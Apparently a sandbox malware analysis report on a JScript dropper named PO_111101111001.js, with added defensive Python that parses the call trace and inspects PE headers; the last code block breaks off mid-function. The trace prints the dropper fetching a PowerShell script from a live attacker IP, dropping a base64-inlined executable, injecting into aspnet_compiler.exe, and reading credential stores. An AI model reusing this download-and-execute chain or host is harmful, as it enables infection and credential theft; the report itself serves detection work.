Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\devil[1].ps1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\System32\wscript.exe | File created: C:\Temp\WTRTRWFSHS.ps1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003299000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: PO_111101111001.js | ReversingLabs: Detection: 27%
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_111101111001.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe "C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe"
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe "C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe"
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: Binary string: WASCDZF.pdbTFnF source: QWQWSAADAF.exe, 0000000B.00000000.1339764750.00000000003B2000.00000002.00000001.01000000.0000000A.sdmp, QWQWSAADAF.exe.9.dr
Source: Binary string: WASCDZF.pdb source: QWQWSAADAF.exe, 0000000B.00000000.1339764750.00000000003B2000.00000002.00000001.01000000.0000000A.sdmp, QWQWSAADAF.exe.9.dr

Data Obfuscation

Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Shell%22");IHost.Name();ITextStream.WriteLine(" entry:470 o:Windows%20Script%20Host f:CreateObject a0:%22WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:470 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:490 f:l a0:526 a1:%22qaek%22");ITextStream.WriteLine(" exit:490 f:l r:%22Scripting.FileSystemObject%22");IHost.Name();ITextStream.WriteLine(" entry:484 o:Windows%20Script%20Host f:CreateObject a0:%22Scripting.FileSystemObject%22");IHost.CreateObject("Scripting.FileSystemObject");IHost.Name();IFileSystem3._00000000();ITextStream.WriteLine(" exit:484 o:Windows%20Script%20Host f:CreateObject r:");IHost.Name();ITextStream.WriteLine(" entry:496 o:Windows%20Script%20Host f:CreateObject a0:%22MSXML2.XMLHTTP%22");IHost.CreateObject("MSXML2.XMLHTTP");IHost.Name();IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:496 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:511 f:l a0:529 a1:%22Sp)8%22");ITextStream.WriteLine(" exit:511 f:l r:%22FolderExists%22");IFileSystem3._00000000();ITextStream.WriteLine(" entry:507 o: f:FolderExists a0:%22C%3A%5CTemp%22");IFileSystem3.FolderExists("C:\Temp");IFileSystem3._00000000();ITextStream.WriteLine(" exit:507 o: f:FolderExists r:false");ITextStream.WriteLine(" entry:522 f:l a0:507 a1:%220C0E%22");ITextStream.WriteLine(" exit:522 f:l r:%22CreateFolder%22");IFileSystem3._00000000();ITextStream.WriteLine(" entry:518 o: f:CreateFolder a0:%22C%3A%5CTemp%22");IFileSystem3.CreateFolder("C:\Temp");IFileSystem3._00000000();IFolder.Path();ITextStream.WriteLine(" exit:518 o: f:CreateFolder r:C%3A%5CTemp");ITextStream.WriteLine(" entry:1256 f:DownloadScript a0:%22http%3A%2F%2F176.65.144.3%2Fdev%2Fdevil.ps1%22 a1:%22C%3A%5CTemp%5CWTRTRWFSHS.ps1%22");ITextStream.WriteLine(" exec:997 f:DownloadScript");ITextStream.WriteLine(" entry:1015 f:m a0:522 a1:%22Cto7%22");ITextStream.WriteLine(" exit:1015 f:m r:%22GET%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:1009 o: f:Open a0:%22GET%22 a1:%22http%3A%2F%2F176.65.144.3%2Fdev%2Fdevil.ps1%22 a2:false");IServerXMLHTTPRequest2.open("GET", "http://176.65.144.3/dev/devil.ps1", "false");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:1009 o: f:Open r:undefined");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:1023 o: f:Send");IServerXMLHTTPRequest2.send();ITextStream.WriteLine(" exit:490 f:l r:%22Scripting.FileSystemObject%22");IHost.Name();ITextStream.WriteLine(" entry:484 o:Windows%20Script%20Host f:CreateObject a0:%22Scripting.FileSystemObject%22");IHost.CreateObject("Scripting.FileSystemObject");IHost.Name();IFileSystem3._00000000();ITextStream.WriteLine(" exit:484 o:Windows%20Script%20Host f:CreateObject r:");IHost.Name();ITextStream.WriteLine(" entry:496 o:Windows%20Script%20Host f:CreateObject a0:%22MSXML2.XMLHTTP%22");IHost.CreateObject("MSXML2.XMLHTTP");IHost.Name();IServerXMLHTTPReque
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEFAK
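The wscript.exe AMSI buffer above is the sandbox's instrumented copy of the dropper: every traced call is written out as `entry:<site> o:<object> f:<function> a0:<arg> ...` with percent-encoded arguments, and the `exit:` records carry return values. Read that way it documents the whole first stage: `CreateObject` of `WScript.Shell`, `Scripting.FileSystemObject` and `MSXML2.XMLHTTP`, `FolderExists`/`CreateFolder` on `C:\Temp`, then a `DownloadScript` helper that issues `Open("GET", "http://176.65.144.3/dev/devil.ps1")` and writes the response to `C:\Temp\WTRTRWFSHS.ps1`. The one-letter helpers are the obfuscation behind the "JScript performs obfuscated calls" signature: `l(526, "qaek")` returns `Scripting.FileSystemObject` and `l(529, "Sp)8")` returns `FolderExists`, so COM ProgIDs and method names never appear as literals in the source. The parser below, an added example rather than sandbox or sample code, pulls the call chain, the strings those helpers resolved, and the network and file IOCs out of a trace in this format; the trace it runs on is a constructed excerpt in the same shape, and the "download-and-drop" heuristic at the end is our own.

```python
import re
from urllib.parse import unquote

# Constructed excerpt in the shape of the instrumented trace in the AMSI buffer above:
# each traced call is logged as " entry:<site> o:<object> f:<function> a0:<arg> ..."
# with percent-encoded arguments; exits carry " r:<return value>".
SAMPLE_TRACE = (
    'ITextStream.WriteLine(" entry:470 o:Windows%20Script%20Host f:CreateObject a0:%22WScript.Shell%22");'
    'ITextStream.WriteLine(" entry:490 f:l a0:526 a1:%22qaek%22");'
    'ITextStream.WriteLine(" exit:490 f:l r:%22Scripting.FileSystemObject%22");'
    'ITextStream.WriteLine(" entry:484 o:Windows%20Script%20Host f:CreateObject a0:%22Scripting.FileSystemObject%22");'
    'ITextStream.WriteLine(" entry:496 o:Windows%20Script%20Host f:CreateObject a0:%22MSXML2.XMLHTTP%22");'
    'ITextStream.WriteLine(" entry:507 o: f:FolderExists a0:%22C%3A%5CTemp%22");'
    'ITextStream.WriteLine(" exit:507 o: f:FolderExists r:false");'
    'ITextStream.WriteLine(" entry:518 o: f:CreateFolder a0:%22C%3A%5CTemp%22");'
    'ITextStream.WriteLine(" entry:1256 f:DownloadScript a0:%22http%3A%2F%2F176.65.144.3%2Fdev%2Fdevil.ps1%22'
    ' a1:%22C%3A%5CTemp%5CWTRTRWFSHS.ps1%22");'
    'ITextStream.WriteLine(" entry:1015 f:m a0:522 a1:%22Cto7%22");'
    'ITextStream.WriteLine(" exit:1015 f:m r:%22GET%22");'
    'ITextStream.WriteLine(" entry:1009 o: f:Open a0:%22GET%22 a1:%22http%3A%2F%2F176.65.144.3%2Fdev%2Fdevil.ps1%22 a2:false");'
    'ITextStream.WriteLine(" entry:1023 o: f:Send");'
)

RECORD_RE = re.compile(r'WriteLine\(" (entry|exit|exec):(\d+)([^"]*)"\)')
FIELD_RE = re.compile(r'(?:^|\s)([a-z]\w*):(\S*)')


def parse_trace(trace):
    """Turn the WriteLine records into dicts; arguments are percent-decoded and unquoted."""
    records = []
    for kind, site, body in RECORD_RE.findall(trace):
        fields, args = {}, {}
        for key, raw in FIELD_RE.findall(body):
            value = unquote(raw)
            if len(value) >= 2 and value[0] == value[-1] == '"':
                value = value[1:-1]          # a0:%22...%22 carries a JS string literal
            if key[0] == "a" and key[1:].isdigit():
                args[int(key[1:])] = value
            else:
                fields[key] = value
        records.append({
            "kind": kind, "site": int(site),
            "obj": fields.get("o", ""), "func": fields.get("f", ""),
            "args": [args[i] for i in sorted(args)], "ret": fields.get("r"),
        })
    return records


def call_chain(records):
    """Ordered list of traced calls, e.g. 'CreateObject(WScript.Shell)'."""
    return [f"{r['func']}({', '.join(r['args'])})" for r in records if r["kind"] == "entry"]


def resolved_strings(records):
    """What the one-letter lookup helpers (l, m) returned: the real ProgIDs and method names."""
    return [r["ret"] for r in records
            if r["kind"] == "exit" and len(r["func"]) == 1 and r["ret"] is not None]


def extract_iocs(records):
    """COM ProgIDs, URLs and local paths seen as call arguments (order kept, deduplicated)."""
    iocs = {"progids": [], "urls": [], "paths": []}

    def add(bucket, value):
        if value not in iocs[bucket]:
            iocs[bucket].append(value)

    for r in records:
        if r["kind"] != "entry":
            continue
        if r["func"] == "CreateObject" and r["args"]:
            add("progids", r["args"][0])
        for arg in r["args"]:
            if re.match(r"https?://", arg, re.I):
                add("urls", arg)
            elif re.match(r"[A-Za-z]:\\", arg):
                add("paths", arg)
    return iocs


def is_download_dropper(iocs):
    """Our heuristic for the 'generate code involving HTTP requests / a shell, file or stream'
    signatures: an HTTP client plus file-system access, a remote URL and a script dropped to disk."""
    progids = {p.lower() for p in iocs["progids"]}
    has_http = any("xmlhttp" in p for p in progids)
    has_fs = "scripting.filesystemobject" in progids
    drops_script = any(p.lower().endswith((".ps1", ".vbs", ".js", ".exe")) for p in iocs["paths"])
    return has_http and has_fs and bool(iocs["urls"]) and drops_script


if __name__ == "__main__":
    recs = parse_trace(SAMPLE_TRACE)
    print("\n".join(call_chain(recs)))
    print("resolved:", resolved_strings(recs))
    print(extract_iocs(recs))
    print("download-and-drop pattern:", is_download_dropper(extract_iocs(recs)))
```

Run against a full AMSI buffer the same parser also recovers the `exec:` records, which mark the script's own function bodies being entered; the helper-resolved strings are the fastest way to get the real API surface of a dropper whose source only shows `l(526, "qaek")`.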
                    Source: PO_111101111001.js | Initial file: High amount of function use 7
                    Source: QWQWSAADAF.exe.9.dr | Static PE information: 0xAF5B34A9 [Sat Mar 24 19:27:37 2063 UTC]
                    Source: QWQWSAADAF.exe.9.dr | Static PE information: section name: .-L3/F
                    Source: QWQWSAADAF.exe.9.dr | Static PE information: section name: (empty)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFC3C3000BD pushad ; iretd 9_2_00007FFC3C3000C1
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Code function: 11_2_0264229E push edi; iretd 11_2_026422A5
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | Code function: 11_2_00CF04D5 push edx; retf 0000h 11_2_00CF04FA
                    Source: QWQWSAADAF.exe.9.dr | Static PE information: section name: .-L3/F entropy: 7.974271644493695
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe | File created: C:\Users\user\AppData\Local\Temp\RUNPEE.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe
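Two things in the findings above are worth reproducing by hand. The `FromBase64String(...)` argument in the PowerShell AMSI buffer starts with `TVqQ`, which is base64 for `MZ\x90\x00`, so the script is inlining a PE image (the file PowerShell then drops as QWQWSAADAF.exe). And the three "Static PE information" lines for that dropped file are plain header checks: a link timestamp in 2063, a section named `.-L3/F`, a section with no name at all, and 7.97 bits of entropy per byte in the named one, which is what an encrypted or packed payload looks like. The code below is an added example, not the sandbox's or the sample's code: it decodes the truncated base64 prefix copied from the finding above (only that prefix is on the page), parses a PE section table straight from the headers, and applies the same three checks to a constructed minimal image that mimics the dropped file. The reference time (mid-March 2025), the 7.0 entropy and 256-byte size thresholds, and the set of characters treated as normal in a section name are assumptions.

```python
import base64
import math
import struct
import time

# Truncated FromBase64String() argument from the AMSI buffer above, used as constructed
# input: only this prefix is on the page, so it is not a complete image.
AMSI_B64_PREFIX = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEFAK"

REPORT_TIMESTAMP = 0xAF5B34A9   # the dropped file's TimeDateStamp from the finding above
NOW = 1742000000                # assumed reference time (mid-March 2025)


def decode_base64_prefix(b64):
    """Decode a truncated base64 blob by dropping the incomplete trailing group."""
    usable = b64[: len(b64) - len(b64) % 4]
    return base64.b64decode(usable)


def is_pe_image(blob):
    """MZ magic plus the DOS stub text that every linker-produced PE carries."""
    return blob[:2] == b"MZ" and b"This program cannot be run in DOS mode" in blob


def shannon_entropy(data):
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(image):
    """Return (TimeDateStamp, [section dicts]) read straight from the PE headers."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
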